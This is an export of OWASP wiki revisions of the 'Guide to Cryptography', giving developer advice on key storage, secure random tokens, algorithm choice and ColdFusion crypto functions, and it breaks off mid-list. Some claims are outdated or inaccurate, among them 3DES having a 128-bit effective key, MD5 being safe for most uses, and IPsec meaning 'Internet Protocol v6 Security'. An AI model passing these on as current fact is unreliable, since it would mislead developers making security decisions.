As highlighted above, crypto relies on keys to assure a user’s identity, provide confidentiality and integrity as well as non-repudiation. It is vital that the keys are adequately protected. Should a key be compromised, it can no longer be trusted.&lt;br /&gt;
&lt;br /&gt;
Any system that has been compromised in any way should have all its cryptographic keys replaced. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Unless you are using hardware cryptographic devices, your keys will most likely be stored as binary files on the system providing the encryption. &lt;br /&gt;
&lt;br /&gt;
Can you export the private key or certificate from the store? &lt;br /&gt;
&lt;br /&gt;
* Are any private keys or certificate import files (usually in PKCS#12 format) on the file system? Can they be imported without a password?&lt;br /&gt;
&lt;br /&gt;
* Keys are often stored in code. This is a bad idea, as it means you will not be able to easily replace keys should they become compromised.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Cryptographic keys should be protected as much as is possible with file system permissions. They should be read only and only the application or user directly accessing them should have these rights.&lt;br /&gt;
&lt;br /&gt;
* Private keys should be marked as not exportable when generating the certificate signing request. &lt;br /&gt;
&lt;br /&gt;
* Once imported into the key store (CryptoAPI, Certificates snap-in, Java Key Store, etc.), the private certificate import file obtained from the certificate provider should be safely destroyed from front-end systems. This file should be safely stored in a safe until required (such as installing or replacing a new front end server).&lt;br /&gt;
&lt;br /&gt;
* Host based intrusion systems should be deployed to monitor access of keys. At the very least, changes in keys should be monitored.&lt;br /&gt;
&lt;br /&gt;
* Applications should log any changes to keys. &lt;br /&gt;
&lt;br /&gt;
* Pass phrases used to protect keys should be stored in physically secure places; in some environments, it may be necessary to split the pass phrase or password into two components such that two people will be required to authorize access to the key. These physical, manual processes should be tightly monitored and controlled.&lt;br /&gt;
&lt;br /&gt;
* Storage of keys within source code or binaries should be avoided. This not only has consequences if developers have access to source code, but key management will be almost impossible.&lt;br /&gt;
&lt;br /&gt;
* In a typical web environment, web servers themselves will need permission to access the key. This has obvious implications that other web processes or malicious code may also have access to the key. In these cases, it is vital to minimize the functionality of the system and application requiring access to the keys.&lt;br /&gt;
&lt;br /&gt;
* For interactive applications, a sufficient safeguard is to use a pass phrase or password to encrypt the key when stored on disk. This requires the user to supply a password on startup, but means the key can safely be stored in cases where other users may have greater file system privileges.&lt;br /&gt;
&lt;br /&gt;
Storage of keys in hardware crypto devices is beyond the scope of this document. If you require this level of security, you should really be consulting with crypto specialists.&lt;br /&gt;
&lt;br /&gt;
==Insecure transmission of secrets ==&lt;br /&gt;
&lt;br /&gt;
In security, we assess the level of trust we have in information. When applied to transmission of sensitive data, we need to ensure that encryption occurs before we transmit the data onto any untrusted network. &lt;br /&gt;
&lt;br /&gt;
In practical terms, this means we should aim to encrypt as close to the source of the data as possible.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
This can be extremely difficult without expert help. We can try to at least eliminate the most common problems:&lt;br /&gt;
&lt;br /&gt;
* The encryption algorithm or protocol needs to be adequate to the task. The above discussion on weak algorithms and weak keys should be a good starting point.&lt;br /&gt;
&lt;br /&gt;
* We must ensure that through all paths of the transmission we apply this level of encryption.&lt;br /&gt;
&lt;br /&gt;
* Extreme care needs to be taken at the point of encryption and decryption. If your encryption library needs to use temporary files, are these adequately protected? &lt;br /&gt;
&lt;br /&gt;
* Are keys stored securely? Is an unsecured file left behind after it has been encrypted?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
We have the possibility to encrypt or otherwise protect data at different levels. Choosing the right place for this to occur can involve looking at both security as well as resource requirements. &lt;br /&gt;
&lt;br /&gt;
'''Application''': at this level, the actual application performs the encryption or other crypto function. This is the most desirable, but can place additional strain on resources and create unmanageable complexity. Encryption would be performed typically through an API such as the OpenSSL toolkit (www.openssl.com) or operating system provided crypto functions.&lt;br /&gt;
&lt;br /&gt;
An example would be an S/MIME encrypted email, which is transmitted as encoded text within a standard email. No changes to intermediate email hosts are necessary to transmit the message because we do not require a change to the protocol itself.&lt;br /&gt;
&lt;br /&gt;
'''Protocol''': at this layer, the protocol provides the encryption service. Most commonly, this is seen in HTTPS, using SSL encryption to protect sensitive web traffic. The application no longer needs to implement secure connectivity. However, this does not mean the application has a free ride. SSL requires careful attention when used for mutual (client-side) authentication, as there are two different session keys, one for each direction. Each should be verified before transmitting sensitive data.&lt;br /&gt;
&lt;br /&gt;
Attackers and penetration testers love SSL to hide malicious requests (such as injection attacks for example). Content scanners are most likely unable to decode the SSL connection, letting it pass to the vulnerable web server.&lt;br /&gt;
&lt;br /&gt;
'''Network''': below the protocol layer, we can use technologies such as Virtual Private Networks (VPN) to protect data. This has many incarnations, the most popular being IPsec (Internet Protocol v6 Security), typically implemented as a protected ‘tunnel’ between two gateway routers. Neither the application nor the protocol needs to be crypto aware – all traffic is encrypted regardless.&lt;br /&gt;
&lt;br /&gt;
Possible issues at this level are computational and bandwidth overheads on network devices.&lt;br /&gt;
&lt;br /&gt;
==Reversible Authentication Tokens ==&lt;br /&gt;
&lt;br /&gt;
Today’s web servers typically deal with large numbers of users. Differentiating between them is often done through cookies or other session identifiers. If these session identifiers use a predictable sequence, an attacker need only generate a value in the sequence in order to present a seemingly valid session token.&lt;br /&gt;
&lt;br /&gt;
This can occur at a number of places; the network level for TCP sequence numbers, or right through to the application layer with cookies used as authenticating tokens.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Any deterministic sequence generator is likely to be vulnerable.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The only way to generate secure authentication tokens is to ensure there is no way to predict their sequence. In other words: true random numbers.&lt;br /&gt;
&lt;br /&gt;
It could be argued that computers can not generate true random numbers, but using new techniques such as reading mouse movements and key strokes to improve entropy has significantly increased the randomness of random number generators. It is critical that you do not try to implement this on your own; use of existing, proven implementations is highly desirable.&lt;br /&gt;
&lt;br /&gt;
Most operating systems include functions to generate random numbers that can be called from almost any programming language.&lt;br /&gt;
&lt;br /&gt;
'''Windows &amp;amp; .NET:''' On Microsoft platforms including .NET, it is recommended to use the inbuilt CryptGenRandom function (&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/seccrypto/security/cryptgenrandom.asp&amp;lt;/u&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
'''Unix:''' For all Unix based platforms, OpenSSL is an excellent option (&amp;lt;u&amp;gt;http://www.openssl.org/&amp;lt;/u&amp;gt;). It features tools and API functions to generate random numbers. On some platforms, /dev/urandom is a suitable source of pseudo-random entropy.&lt;br /&gt;
&lt;br /&gt;
'''PHP:'''  mt_rand() uses a Mersenne Twister, but is nowhere near as good as CryptoAPI’s secure random number generation options, OpenSSL, or /dev/urandom which is available on many Unix variants. mt_rand() has been noted to produce the same number on some platforms – test prior to deployment. '''Do not use rand() as it is very weak.'''&lt;br /&gt;
&lt;br /&gt;
'''Java:''' java.security.SecureRandom within the Java Cryptography Extension (JCE) provides secure random numbers. This should be used in preference to other random number generators.&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion: '''ColdFusion MX 7 leverages the JCE java.security.SecureRandom class of the underlying JVM as its pseudo random number generator (PRNG)'''''.'' '''&lt;br /&gt;
&lt;br /&gt;
==Safe UUID generation ==&lt;br /&gt;
&lt;br /&gt;
UUIDs (such as GUIDs and so on) are only unique if you generate them. This seems relatively straightforward. However, there are many code snippets available that contain existing UUIDS. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
# Determine the source of your existing UUIDS &lt;br /&gt;
## Did they come from MSDN?&lt;br /&gt;
## Or from an example found on the Internet? &lt;br /&gt;
# Use your favorite search engine to find out&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not cut and paste UUIDs and GUIDs from anything other than the UUIDGEN program or from the UuidCreate() API&lt;br /&gt;
&lt;br /&gt;
* Generate fresh UUIDs or GUIDs for each new program &lt;br /&gt;
&lt;br /&gt;
==Summary ==&lt;br /&gt;
&lt;br /&gt;
Cryptography is one of pillars of information security. Its usage and propagation has exploded due to the Internet and it is now included in most areas computing. Crypto can be used for:&lt;br /&gt;
&lt;br /&gt;
* Remote access such as IPsec VPN&lt;br /&gt;
&lt;br /&gt;
* Certificate based authentication&lt;br /&gt;
&lt;br /&gt;
* Securing confidential or sensitive information&lt;br /&gt;
&lt;br /&gt;
* Obtaining non-repudiation using digital certificates&lt;br /&gt;
&lt;br /&gt;
* ?Online orders and payments&lt;br /&gt;
&lt;br /&gt;
* Email and messaging security such as S/MIME&lt;br /&gt;
&lt;br /&gt;
A web application can implement cryptography at multiple layers: application, application server or runtime (such as .NET), operating system and hardware. Selecting an optimal approach requires a good understanding of application requirements, the areas of risk, and the level of security strength it might require, flexibility, cost, etc.&lt;br /&gt;
&lt;br /&gt;
Although cryptography is not a panacea, the majority of security breaches do not come from brute force computation but from exploiting mistakes in implementation. The strength of a cryptographic system is measured in key length. Using a large key length and then storing the unprotected keys on the same server eliminates most of the protection benefit gained. Besides the secure storage of keys, another classic mistake is engineering custom cryptographic algorithms (to generate random session ids for example). Many web applications were successfully attacked because the developers thought they could create their crypto functions. &lt;br /&gt;
&lt;br /&gt;
Our recommendation is to use proven products, tools, or packages rather than rolling your own.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Wu, H., ''Misuse of stream ciphers in Word and Excel''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://eprint.iacr.org/2005/007.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Bindview, ''Vulnerability in Windows NT's SYSKEY encryption'' &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.bindview.com/Services/razor/Advisories/1999/adv_WinNT_syskey.cfm&amp;lt;/u&amp;gt; [[category:FIXME|is this going to the correct page?]]&lt;br /&gt;
&lt;br /&gt;
* Schneier, B. ''Is 1024 bits enough?, ''April 2002 Cryptogram''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.schneier.com/crypto-gram-0204.html#3&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Schneier, B., Cryptogram, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.counterpane.com/cryptogram.html&amp;lt;/u&amp;gt; [[category:FIXME|link not working]]&lt;br /&gt;
&lt;br /&gt;
* NIST, Replacing SHA-1 with stronger variants: SHA-256 ? 512&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkhash.html&amp;lt;/u&amp;gt; [[category:FIXME|these two links go to the same page]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkencryption.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* UUIDs are only unique if you generate them:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/larryosterman/archive/2005/07/21/441417.aspx&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Cryptographically Secure Random Numbers on Win32:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Cryptography ==&lt;br /&gt;
&lt;br /&gt;
The following section describes ColdFusion’s cryptography features. ColdFusion MX leverages the Java Cryptography Extension (JCE) of the underlying J2EE platform for cryptography and random number generation. It provides functions for symmetric (or private-key) encryption. While it does not provide native functionality for public-key (asymmetric) encryption, it does use the Java Secure Socket Extension (JSSE) for SSL communication.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pseudo-Random Number Generation'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides three functions for random number generation: rand(), randomize(), and randRange(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Rand''' – Use to generate a pseudo-random number&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	rand([algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Randomize''' – Use to seed the pseudo-random number generator (PRNG) with an integer.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randomize(number [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RandRange''' – Use to generate a pseudo-random integer within the range of the specified numbers&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randrange(number1, number2 [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following values are the allowed algorithm parameters''' ''':&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: (default) – Invokes java.util.rand&lt;br /&gt;
&lt;br /&gt;
SHA1PRNG: (recommended) – Invokes java.security.SecureRandom using the Sun Java SHA-1 PRNG algorithm.&lt;br /&gt;
&lt;br /&gt;
IBMSecureRandom: IBM WebSphere’s JVM does not support the SHA1PRNG algorithm. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Symmetric Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 provides six encryption functions: decrypt(), decryptBinary(), encrypt(), encryptBinary(), generateSecretKey(), and hash(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Decrypt''' – Use to decrypt encrypted strings with specified key, algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decrypt(encrypted_string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]]))'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''DecryptBinary''' – Use to decrypt encrypted binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Encrypt''' – Use to encrypt string using specific algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encrypt(string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]]))'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''EncryptBinary''' – Use to encrypt binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''GenerateSecretKey''' – Use to generate a secure key using the specified algorithm for the encrypt and encryptBinary functions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	generateSecretKey(algorithm)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Hash '''– Use for one-way conversion of a variable-length string to fixed-length string using the specified algorithm and encoding&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	hash(string[, algorithm[, encoding]] )'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion offers the following default algorithms for these functions''' ''':&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: the algorithm used in ColdFusion MX and prior releases. This algorithm is the least secure option (default). &lt;br /&gt;
&lt;br /&gt;
AES: the Advanced Encryption Standard specified by the National Institute of Standards and Technology (NIST) FIPS-197. (recommended)&lt;br /&gt;
&lt;br /&gt;
BLOWFISH: the Blowfish algorithm defined by Bruce Schneier. &lt;br /&gt;
&lt;br /&gt;
DES: the Data Encryption Standard algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
DESEDE: the &amp;quot;Triple DES&amp;quot; algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndDES: A password-based version of the DES algorithm which uses a MD5 hash of the specified password as the encryption key &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndTripleDES: A password-based version of the DESEDE algorithm which uses a MD5 hash of the specified password as the encryption key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following algorithms are provided by default for the hash() function. Note, SHA algorithms used in ColdFusion are NIST FIPS-180-2 compliant''' ''':&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: Generates a MD5 hash string identical to that generated by ColdFusion MX and ColdFusion MX 6.1 (default). &lt;br /&gt;
&lt;br /&gt;
MD5: Generates a 128-bit digest.&lt;br /&gt;
&lt;br /&gt;
SHA: Generates a 160-bit digest. (SHA-1)&lt;br /&gt;
&lt;br /&gt;
SHA-256: Generates a 256-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-384: Generates a 384-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-512: Generates a 512-bit digest&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pluggable Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 introduced pluggable encryption for CFML. The JCE allows developers to specify multiple cryptographic service providers. ColdFusion can leverage the algorithms, feedback modes, and padding methods of third-party Java security providers to strengthen its cryptography functions. For example, ColdFusion can leverage the Bouncy Castle ('''&amp;lt;u&amp;gt;http://www.bouncycastle.org/'''&amp;lt;/u&amp;gt;) crypto package and use the SHA-224 algorithm for the hash() function or the Serpent block encryption for the encrypt() function.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
See Macromedia’s Strong Encryption in ColdFusion MX 7 technote for information on installing additional security providers for ColdFusion at http://www.macromedia.com/go/e546373d. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SSL'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion does not provide tags and functions for public-key encryption, but it can communicate over SSL. ColdFusion leverages the Sun JSSE to communicate over SSL with web and LDAP (lightweight directory access protocol) servers. ColdFusion uses the Java certificate database (e.g. jre_root/lib/security/cacerts) to store server certificates. It compares presented certificate of remote systems to those stored in the database. It also grabs the host system’s certificate from this database and uses it to present to remote systems to initiate the SSL handshake. Certificate information is then exposed as CGI variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices'''''&lt;br /&gt;
&lt;br /&gt;
*Enable /dev/urandom for higher entropy for random number generation&lt;br /&gt;
&lt;br /&gt;
*Call the randomize function before calling rand() or randRange() to seed the random number generator&lt;br /&gt;
&lt;br /&gt;
*DO NOT use the CFMX_COMPAT algorithms. Upgrade your application to use stronger cryptographic ciphers.&lt;br /&gt;
&lt;br /&gt;
*Use AES or higher for symmetric encryption &lt;br /&gt;
&lt;br /&gt;
*Use SHA-256 or higher for the hash function&lt;br /&gt;
&lt;br /&gt;
*Use a salt (or random string) for password generation with the hash function&lt;br /&gt;
&lt;br /&gt;
*Always use generateSecretKey() to generate keys of the appropriate length for Block Encryption algorithms unless a customized key is required&lt;br /&gt;
&lt;br /&gt;
*Use separate key databases to store remote server certificates separately from the ColdFusion server’s certificate&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Encryption]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59966</id>
		<title>Guide to Cryptography</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59966"/>
				<updated>2009-05-03T15:59:33Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Asymmetric Cryptography (also called Public/Private Key Cryptography) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that cryptography is safely used to protect the confidentiality and integrity of sensitive user data.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS5.18 – Cryptographic key management&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Initially confined to the realms of academia and the military, cryptography has become ubiquitous thanks to the Internet. Common every day uses of cryptography include mobile phones, passwords, SSL, smart cards, and DVDs. Cryptography has permeated everyday life, and is heavily used by many web applications.&lt;br /&gt;
&lt;br /&gt;
Cryptography (or crypto) is one of the more advanced topics of information security, and one whose understanding requires the most schooling and experience. It is difficult to get right because there are many approaches to encryption, each with advantages and disadvantages that need to be thoroughly understood by web solution architects and developers.  In addition, serious cryptography research is typically based in advanced mathematics and number theory, providing a serious barrier to entry. &lt;br /&gt;
&lt;br /&gt;
The proper and accurate implementation of cryptography is extremely critical to its efficacy. A small mistake in configuration or coding will result in removing a large degree of the protection it affords and rending the crypto implementation useless against serious attacks.&lt;br /&gt;
&lt;br /&gt;
A good understanding of crypto is required to be able to discern between solid products and snake oil. The inherent complexity of crypto makes it easy to fall for fantastic claims from vendors about their product. Typically, these are “a breakthrough in cryptography” or “unbreakable” or provide &amp;quot;military grade&amp;quot; security. If a vendor says &amp;quot;trust us, we have had experts look at this,” chances are they weren't experts!&lt;br /&gt;
&lt;br /&gt;
==Cryptographic Functions ==&lt;br /&gt;
&lt;br /&gt;
Cryptographic systems can provide one or more of the following four services. It is important to distinguish between these, as some algorithms are more suited to particular tasks, but not to others.&lt;br /&gt;
&lt;br /&gt;
When analyzing your requirements and risks, you need to decide which of these four functions should be used to protect your data.&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Using a cryptographic system, we can establish the identity of a remote user (or system). A typical example is the SSL certificate of a web server providing proof to the user that he or she is connected to the correct server.&lt;br /&gt;
&lt;br /&gt;
The identity is not of the user, but of the cryptographic key of the user. Having a less secure key lowers the trust we can place on the identity.&lt;br /&gt;
&lt;br /&gt;
===Non-Repudiation ===&lt;br /&gt;
&lt;br /&gt;
The concept of non-repudiation is particularly important for financial or e-commerce applications. Often, cryptographic tools are required to prove that a unique user has made a transaction request. It must not be possible for the user to refute his or her actions.&lt;br /&gt;
&lt;br /&gt;
For example, a customer may request a transfer of money from her account to be paid to another account. Later, she claims never to have made the request and demands the money be refunded to the account. If we have non-repudiation through cryptography, we can prove – usually through digitally signing the transaction request, that the user authorized the transaction.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
More commonly, the biggest concern will be to keep information private. Cryptographic systems were originally developed to function in this capacity. Whether it be passwords sent during a log on process, or storing confidential medical records in a database, encryption can assure that only users who have access to the appropriate key will get access to the data.&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
We can use cryptography to provide a means to ensure data is not viewed or altered during storage or transmission. Cryptographic hashes for example, can safeguard data by providing a secure checksum.&lt;br /&gt;
&lt;br /&gt;
==Cryptographic Algorithms ==&lt;br /&gt;
&lt;br /&gt;
Various types of cryptographic systems exist that have different strengths and weaknesses. Typically, they are divided into two classes; those that are strong, but slow to run and those that are quick, but less secure. Most often a combination of the two approaches is used (e.g.: SSL), whereby we establish the connection with a secure algorithm, and then if successful, encrypt the actual transmission with the weaker, but much faster algorithm.&lt;br /&gt;
&lt;br /&gt;
===Symmetric Cryptography ===&lt;br /&gt;
&lt;br /&gt;
Symmetric Cryptography is the most traditional form of cryptography.  In a symmetric cryptosystem, the involved parties share a common secret (password, pass phrase, or key). Data is encrypted and decrypted using the same key. These algorithms tend to be comparatively fast, but they cannot be used unless the involved parties have already exchanged keys.  Any party possessing a specific key can create encrypted messages using that key as well as decrypt any messages encrypted with the key.  In systems involving a number of users who each need to set up independent, secure communication channels symmetric cryptosystems can have practical limitations due to the requirement to securely distribute and manage large numbers of keys.&lt;br /&gt;
&lt;br /&gt;
Common examples of symmetric algorithms are DES, 3DES and AES. The 56-bit keys used in DES are short enough to be easily brute-forced by modern hardware and DES should no longer be used.  Triple DES (or 3DES) uses the same  algorithm, applied three times with different keys giving it an effective key length of 128 bits.  Due to the problems using the DES alrgorithm, the United States National Institute of Standards and Technology (NIST) hosted a selection process for a new algorithm.  The winning algorithm was Rijndael and the associated cryptosystem is now known as the Advanced Encryption Standard or AES.  For most applications 3DES is acceptably secure at the current time, but for most new applications it is advisable to use AES.&lt;br /&gt;
&lt;br /&gt;
===Asymmetric Cryptography (also called Public/Private Key Cryptography) ===&lt;br /&gt;
&lt;br /&gt;
Asymmetric algorithms use two keys, one to encrypt the data, and either key to decrypt. These inter-dependent keys are generated together. One is labeled the Public key and is distributed freely. The other is labeled the Private Key and must be kept hidden.&lt;br /&gt;
&lt;br /&gt;
Often referred to as Public/Private Key Cryptography, these cryptosystems can provide a number of different functions depending on how they are used. &lt;br /&gt;
&lt;br /&gt;
The most common usage of asymmetric cryptography is to send messages with a guarantee of confidentiality.  If User A wanted to send a message to User B, User A would get access to User B’s publicly-available Public Key.  The message is then encrypted with this key and sent to User B.  Because of the cryptosystem’s property that messages encoded with the Public Key of User B can only be decrypted with User B’s Private Key, only User B can read the message.&lt;br /&gt;
&lt;br /&gt;
Another usage scenario is one where User A wants to send User B a message and wants User B to have a guarantee that the message was sent by User A.  In order to accomplish this, User A would encrypt the message with their Private Key.  The message can then only be decrypted using User A’s Public Key.  This guarantees that User A created the message Because they are then only entity who had access to the Private Key required to create a message that can be decrcrypted by User A’s Public Key.  This is essentially a digital signature guaranteeing that the message was created by User A.&lt;br /&gt;
&lt;br /&gt;
A Certificate Authority (CA), whose public certificates are installed with browsers or otherwise commonly available, may also digitally sign public keys or certificates. We can authenticate remote systems or users via a mutual trust of an issuing CA. We trust their ‘root’ certificates, which in turn authenticate the public certificate presented by the server.[[Category:FIXME|seems like there should be a noun after &amp;quot;avialable&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
PGP and SSL are prime examples of a systems implementing asymmetric cryptography, using RSA or other algorithms.&lt;br /&gt;
&lt;br /&gt;
===Hashes ===&lt;br /&gt;
&lt;br /&gt;
Hash functions take some data of an arbitrary length (and possibly a key or password) and generate a fixed-length hash based on this input. Hash functions used in cryptography have the property that it is easy to calculate the hash, but difficult or impossible to re-generate the original input if only the hash value is known.  In addition, hash functions useful for cryptography  have the property that it is difficult to craft an initial input such that the hash will match a specific desired value.&lt;br /&gt;
&lt;br /&gt;
MD5 and SHA-1 are common hashing algorithms used today. These algorithms are considered weak (see below) and are likely to be replaced after a process similar to the AES selection. New applications should consider using SHA-256 instead of these weaker algorithms.&lt;br /&gt;
&lt;br /&gt;
===Key Exchange Algorithms ===&lt;br /&gt;
&lt;br /&gt;
Lastly, we have key exchange algorithms (such as Diffie-Hellman for SSL). These allow use to safely exchange encryption keys with an unknown party. &lt;br /&gt;
&lt;br /&gt;
==Algorithm Selection ==&lt;br /&gt;
&lt;br /&gt;
As modern cryptography relies on being computationally expensive to break, specific standards can be set for key sizes that will provide assurance that with today’s technology and understanding, it will take too long to decrypt a message by attempting all possible keys.&lt;br /&gt;
&lt;br /&gt;
Therefore, we need to ensure that both the algorithm and the key size are taken into account when selecting an algorithm.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Proprietary encryption algorithms are not to be trusted as they typically rely on ‘security through obscurity’ and not sound mathematics. These algorithms should be avoided if possible.&lt;br /&gt;
&lt;br /&gt;
Specific algorithms to avoid:&lt;br /&gt;
&lt;br /&gt;
* MD5 has recently been found less secure than previously thought. While still safe for most applications such as hashes for binaries made available publicly, secure applications should now be migrating away from this algorithm.&lt;br /&gt;
&lt;br /&gt;
* SHA-0 has been conclusively broken. It should no longer be used for any sensitive applications.&lt;br /&gt;
&lt;br /&gt;
* SHA-1 has been reduced in strength and we encourage a migration to SHA-256, which implements a larger key size.&lt;br /&gt;
&lt;br /&gt;
* DES was once the standard crypto algorithm for encryption; a normal desktop machine can now break it. AES is the current preferred symmetric algorithm.&lt;br /&gt;
&lt;br /&gt;
Cryptography is a constantly changing field. As new discoveries in cryptanalysis are made, older algorithms will be found unsafe. In addition, as computing power increases the feasibility of brute force attacks will render other cryptosystems or the use of certain key lengths unsafe. Standard bodies such as NIST should be monitored for future recommendations. &lt;br /&gt;
&lt;br /&gt;
Specific applications, such as banking transaction systems may have specific requirements for algorithms and key sizes.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assuming you have chosen an open, standard algorithm, the following recommendations should be considered when reviewing algorithms:&lt;br /&gt;
&lt;br /&gt;
'''Symmetric:'''&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
